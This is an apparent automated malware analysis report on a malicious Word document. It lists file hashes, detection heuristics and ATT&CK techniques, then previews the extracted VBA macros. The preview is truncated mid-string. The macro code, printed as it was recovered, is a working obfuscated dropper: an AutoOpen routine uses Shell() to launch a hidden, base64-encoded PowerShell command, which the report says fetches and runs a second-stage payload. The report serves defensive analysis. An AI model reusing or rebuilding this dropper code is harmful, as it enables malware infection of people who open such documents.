Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36ee7a749dea5bd6…

MALICIOUS

Office (OLE)

Size: 91.2 KB
Created: 2018-05-30 09:46:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: e630b0484409a3835392ca9589ef2c99
SHA-1: af34ebe248d7e1c0958f1d37e755a8346828f47c
SHA-256: 36ee7a749dea5bd6a47c6230ad2d21d8caedb9e495b6ff6b25360bc27e0bb31e
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the execution of a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The `Shell()` call within the VBA code directly supports this execution flow.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6565431-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6565431-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11032 bytes
SHA-256: 6595a2a17208aa16288a894027fcbf3d422c0df03e3cbfc987c79623bc8f9749

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "rGfoNwCwZZoj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iZjOfzzK()
On Error Resume Next
AIoFjB = Fix(67982 / CSng(56556) * tUlEp * tAizc)
VhBn = CDate(79561)
EcKCJ = Fix(10786 / CSng(24438) * vdcKI * riZtTL)
VhBn = CDate(82901)
iZjOfzzK = RfHIq + kiidUtOiGVQ + BpsIzouv + TQIJhGca + AXGAYh + AnOPwhAiZc + jfzsAaNYS
FFajj = Fix(44212 / CSng(87206) * RGzjE * vdrdQ)
VhBn = CDate(84704)
End Function
Sub Autoopen()
On Error Resume Next
qJujaC = Fix(33918 / CSng(10116) * IdZwX * bZYpd)
VhBn = CDate(49575)
RXXfv (iZjOfzzK)
VMZrf = Fix(75157 / CSng(91454) * quzGO * fCGUbP)
VhBn = CDate(24697)
End Sub
Function RXXfv(UZbbkIEl)
On Error Resume Next
TJFpqB = Fix(34080 / CSng(9193) * OYdniH * WiJCRi)
VhBn = CDate(51095)
uzBEGnDNqF = RnDioOB + Shell(DXwWwqptCSj + (Chr(vbKeyP)) + tavaC + UZbbkIEl + rjNhP, zNMwiud + vbHide + DwVQvc)
IJvXSU = Fix(3783 / CSng(18868) * WsPmq * tklTki)
VhBn = CDate(71375)
End Function


Attribute VB_Name = "zvXzzGKh"
Function RfHIq()
On Error Resume Next
KnszJo = Fix(80410 / CSng(59468) * nuQas * pscicn)
VhBn = CDate(32711)
WRClkaTZ = "owersHeLL " + "-WinD" + "owsTyle hidde" + "n -e IAA" + "uACAAKAAg" + "ACQAUABzAEgAbwB" + "NAEUAWwA0A" + "F0AKwAkAFAAcwBo" + "AG8ATQBlA"
YGYzwp = Fix(9606 / CSng(72628) * zwaoYc * IXFMO)
VhBn = CDate(57431)
SCIsMfOYG = "FsAMw" + "A0AF0AKwAnAFgA" + "JwApACA" + "AKAAgACgA"
lTjsU = Fix(5683 / CSng(59079) * EtGTql * spHBHQ)
VhBn = CDate(58482)
JjtWvS = "KAAoACIAewA" + "zADIAf" + "QB7ADEANgB" + "9AHsANQA"
zQPaV = Fix(9689 / CSng(64009) * Tuzmi * zkiIT)
VhBn = CDate(83446)
SSVGkNCpAK = "5AH0AewA2A" + "DUAfQB7ADUAfQB" + "7ADcAN" + "QB9AHsA" + "NAA1A" + "H0AewA2A" + "DcAfQB" + "7ADAAfQ"
hFmQRi = Fix(30922 / CSng(9990) * WqHBm * FcIbXp)
VhBn = CDate(75542)
kOWOwLaRLSp = "B7ADIANwB9AHs" + "AMgAzAH0Ae" + "wAzADQAfQB" + "7ADIAN" + "AB9AHsAMwA"
rzMfs = Fix(44542 / CSng(36734) * znkPLd * EaRzG)
VhBn = CDate(47249)
qDYGY = "zAH0Aew" + "A0ADkAf" + "QB7ADQANwB9" + "AHsAM" + "QA5AH0AewA"
icbVi = Fix(12018 / CSng(98750) * TrujuR * zXitW)
VhBn = CDate(86655)
jnlbSMjFwZY = "2ADgAfQB7ADkAfQ" + "B7ADEA" + "MgB9AHsANwAyAH" + "0AewA0ADg" + "AfQB7ADYANgB" + "9AHsAMgA5AH" + "0AewA3ADMAf"
QWQcS = Fix(8365 / CSng(2644) * qjAiU * EWsMAG)
VhBn = CDate(36579)
AjWUzTGAf = "QB7AD" + "UAMgB" + "9AHsANQAw" + "AH0Aew" + "AxAH0AewA1" + "ADQAfQB7ADQANA"
Viiszb = Fix(87600 / CSng(32957) * BPKME * CnvqN)
VhBn = CDate(3181)
LlcEjI = "B9AHs" + "ANAAyAH0A" + "ewA1ADMAfQ" + "B7ADcAOAB9AH" + "sAMQA0AH0AewAxA" + "DcAfQB" + "7ADMAO" + "QB9AHsANQA" + "4AH0AewAxADEA" + "fQB7ADYAMgB"
RfHIq = WRClkaTZ + SCIsMfOYG + JjtWvS + SSVGkNCpAK + kOWOwLaRLSp + qDYGY + jnlbSMjFwZY + AjWUzTGAf + LlcEjI
End Function
Function kiidUtOiGVQ()
On Error Resume Next
jLzVu = Fix(2002 / CSng(80333) * WnBXAl * aEaMZS)
VhBn = CDate(96726)
DskDbf = "9AHsA" + "NgB9AHsAMgAx" + "AH0AewA3A" + "DcAfQ" + "B7ADQAMAB9AHs" + "AMQAwAH0AewA2AD" + "AAfQB7ADQAMQB"
JXzRp = Fix(49104 / CSng(9928) * FrHwW * djsbhf)
VhBn = CDate(54751)
ojKAwd = "9AHsAMQAzAH0" + "AewA2ADkAfQB" + "7ADMAOAB" + "9AHsAN" + "AAzAH0" + "AewAyADYA" + "fQB7ADcAN" + "gB9AH" + "sAMwA1A" + "H0AewA0AH0"
oEUJM = Fix(80788 / CSng(30908) * cvisn * vkAGRX)
VhBn = CDate(92503)
WLARDBb = "AewA3ADQAfQB" + "7ADIANQB9AHsAMw" + "B9AHsAN" + "wAxAH0AewA1AD" + "UAfQB7" + "ADEANQB" + "9AHsAMgB9AH" + "sAMgAwAH0" + "AewA3AH0AewA2"
tnWfbt = Fix(38696 / CSng(95604) * TqAjvw * NPzEOL)
VhBn = CDate(30682)
iPMOw = "ADMAfQB7ADYANAB" + "9AHsAMwAxAH" + "0AewA3A" + "DAAfQB7AD" + "MANgB9AHsAMQA4A" + "H0Aew" + "AzADcAf" + "QB7ADgAfQB" + "7ADQANgB9AHsA"
HjlIbb = Fix(26683 / CSng(9987) * HLjmj * WhiKP)
VhBn = CDate(2818)
TfjOrvaol = "NQA3AH0AewAy" + "ADIAfQB" + "7ADYAMQB9AH" + "sAMgA4AH0AewA"
OznUtC = Fix(45337 / CSng(84758) * hXrYu * LWJFl)
VhBn = CDate(75378)
ddZTGwLmo = "1ADEAf" + "QB7ADUA" + "NgB9AHsAMwAwA" + "H0AI
... (truncated)